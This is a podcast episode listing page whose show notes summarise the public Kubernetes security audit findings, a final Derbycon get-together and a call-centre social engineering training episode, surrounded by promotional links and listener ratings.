https://cloud.google.com/blog/products/gcp/exploring-container-security-running-a-tight-ship-with-kubernetes-engine-1-10

https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster

CNCF:  https://www.youtube.com/watch?v=90kZRyPcRZw

Findings:

Scope for testing:

        Source code review (what languages did they have to review?)

            Golang, shell, ...

Networking (discuss the networking *internal* *external*

Cryptography (TLS, data stores)

AuthN/AuthZ 

RBAC (which roles were tested? Just admin/non-admin *best practice is no admin/least priv*)

Secrets

Namespace traversals

Namespace claims

Methodology:

Setup a bunch of environments?

Primarily set up a single environment IIRC

Combination of code audit and active ?fuzzing?

What does one fuzz on a K8s environment?

Tested with latest alpha or production versions?

Version 1.13 or 1.14 - version locked at whatever was current - K8S releases a new version every 3 months, so this is a challenge and means we have to keep auditing.

Tested mulitple different types of k8s implementations?

Tested primarily against kubespray (https://github.com/kubernetes-sigs/kubespray)

Bug Bounty program:

https://github.com/kubernetes/community/blob/master/contributors/guide/bug-bounty.md

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Sep 16 2019

44mins

Play

the last Derbycon Brakesec podcast

Podcast cover
Read more

This evening, we all came together to spend a bit of time talking about the final Derbycon. We talk to Mic Douglas about his 9 Derbycon appearances, Gary Rimar (piano player Extraordinare) talks about @litmoose's talk on how to tell C-Levels that their applications aren't good.

We also got asked about how the show came about, and how we found each other.

Apologies for the echo in some parts... I did what I could to clean it up, but we were too close and the mics got a bit overzealous...

Sep 07 2019

50mins

Play

2019-032-kubernetes security audit dicussion with Jay Beale and Aaron Small

Podcast cover
Read more

Topics:Infosec Campout report

Derbycon Pizza Party (with podcast show!)  https://www.eventbrite.com/e/brakesec-pizza-party-at-the-derbycon-mental-health-village-tickets-69219271705

Mental health village at Derbycon

Jay Beale (co-lead for audit) *Bust-a-Kube*  

Aaron Small (product mgr at GKE/Google)

Atreides Partners

Trail of Bits

What was the Audit? 

How did it come about? 

Who were the players?

    Kubernetes Working Group

        Aaron, Craig, Jay, Joel

    Outside vendors:

        Atredis: Josh, Nathan Keltner

        Trail of Bits: Stefan Edwards, Bobby Tonic , Dominik

    Kubernetes Project Leads/Devs

        Interviewed devs -- this was much of the info that went into the threat model

        Rapid Risk Assessments - let’s put the GitHub repository in the show notes

What did it produce?

    Vuln Report

    Threat Model - https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Threat%20Model.pdf

    White Papers

https://github.com/kubernetes/community/tree/master/wg-security-audit/findings

    Discuss the results:

        Threat model findings

            Controls silently fail, leading to a false sense of security

                Pod Security Policies, Egress Network Rules

            Audit model isn’t strong enough for non-repudiation

                By default, API server doesn’t log user movements through system

            TLS Encryption weaknesses

                Most components accept cleartext HTTP

                Boot strapping to add Kubelets is particularly weak       

                Multiple components do not check certificates and/or use self-signed certs

                HTTPS isn’t enforced

                Certificates are long-lived, with no revocation capability

                Etcd doesn’t authenticate connections by default

            Controllers all Bundled together

                Confused Deputy: b/c lower priv controllers bundled in same binary as higher

            Secrets not encrypted at rest by default

            Etcd doesn’t have signatures on its write-ahead log

            DoS attack: you can set anti-affinity on your pods to get nothing else scheduled on their nodes

            Port 10255 has an unauthenticated HTTP server for status and health checking

        Vulns / Findings (not complete list, but interesting)

            Hostpath pod security policy bypass via persistent volumes

            TOCTOU when moving PID to manager’s group

            Improperly patched directory traversal in kubectl cp

            Bearer tokens revealed in logs

            Lots of MitM risk:

            SSH not checking fingerprints: InsecureIgnoreHostKey

            gRPC transport seems all set to WithInsecure()

HTTPS connections not checking certs 

            Some HTTPS connections are unauthenticated

            Output encoding on JSON construction

                This might lead to further work, as JSON can get written to logs that may be consumed elsewhere.

            Non-constant time check on passwords

Lack of re-use / library-ification of code

    Who will use these findings and how? Devs, google, bad guys? 

    Any new audit tools created from this? 

Brad geesaman “Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman, Symantec   https://www.youtube.com/watch?v=vTgQLzeBfRU

Aaron Small: 

https://cloud.google.com/blog/products/gcp/precious-cargo-securing-containers-with-kubernetes-engine-18

https://cloud.google.com/blog/products/gcp/exploring-container-security-running-a-tight-ship-with-kubernetes-engine-1-10

https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster

CNCF:  https://www.youtube.com/watch?v=90kZRyPcRZw

Findings:

Scope for testing:

        Source code review (what languages did they have to review?)

            Golang, shell, ...

Networking (discuss the networking *internal* *external*

Cryptography (TLS, data stores)

AuthN/AuthZ 

RBAC (which roles were tested? Just admin/non-admin *best practice is no admin/least priv*)

Secrets

Namespace traversals

Namespace claims

Methodology:

Setup a bunch of environments?

Primarily set up a single environment IIRC

Combination of code audit and active ?fuzzing?

What does one fuzz on a K8s environment?

Tested with latest alpha or production versions?

Version 1.13 or 1.14 - version locked at whatever was current - K8S releases a new version every 3 months, so this is a challenge and means we have to keep auditing.

Tested mulitple different types of k8s implementations?

Tested primarily against kubespray (https://github.com/kubernetes-sigs/kubespray)

Bug Bounty program:

https://github.com/kubernetes/community/blob/master/contributors/guide/bug-bounty.md

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Aug 31 2019

47mins

Play

2019-031- Dissecting a Social engineering attack (Part 2)

Podcast cover
Read more

Intro - Ms. DirInfosec “Anna”

Call Centers suffer from wanting to give good customer service and need to move the call along.

    Metrics are tailored to support an environment conducive to these kinds of attacks

https://en.wikipedia.org/wiki/Social_engineering_(security)

Social engineering will prey on people’s altruism 

    “Pregnant woman needing help through the security door”

    “Person on crutches”    “Delivery person with arms full”

    “Can’t remember information, others filling in missing bits”

    Call Center Reps are _paid_ to be helpful. “Customer is never wrong”

Creating a sense of urgency to spur action

Real-life scenario: "bob calls asking about status of an order"

Questions: 

  1. What were you doing for training prior to these calls? (it’s alright if you weren’t doing anything) :)

Pre-training audio (#1 and #2)

  1. What was their reaction about the calls received?

  1. Did the training take the first time?
    1. What difficulties did you have after the first training?
    2. ‘Getting better Audio’ (#3)
    1. Fake calls?
    2. Show examples?
  2. Talk about the training, what kind of training:
    1. Post audio (#4 and #5)
  3. How did your call center reps handle the training?
  4. For a business standpoint, what had to be changed to accommodate the new processes

https://www.pindrop.com/blog/tackling-113-fraud-increase-call-centers-webinar-recap/

https://www.bai.org/banking-strategies/article-detail/beating-crooks-at-call-center-fraud

@consultingCSO on twitter

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Aug 16 2019

50mins

Play

iTunes Ratings

79 Ratings
Average Ratings
68
6
4
0
1

Great Security Pod

By The Drewsk - Oct 05 2018
Read more
Great security podcast even for non-security IT folks. Give it a listen!

Amazing!

By elliott2k - Jun 21 2017
Read more
I love the podcast and the community behind it. Much love! 10/10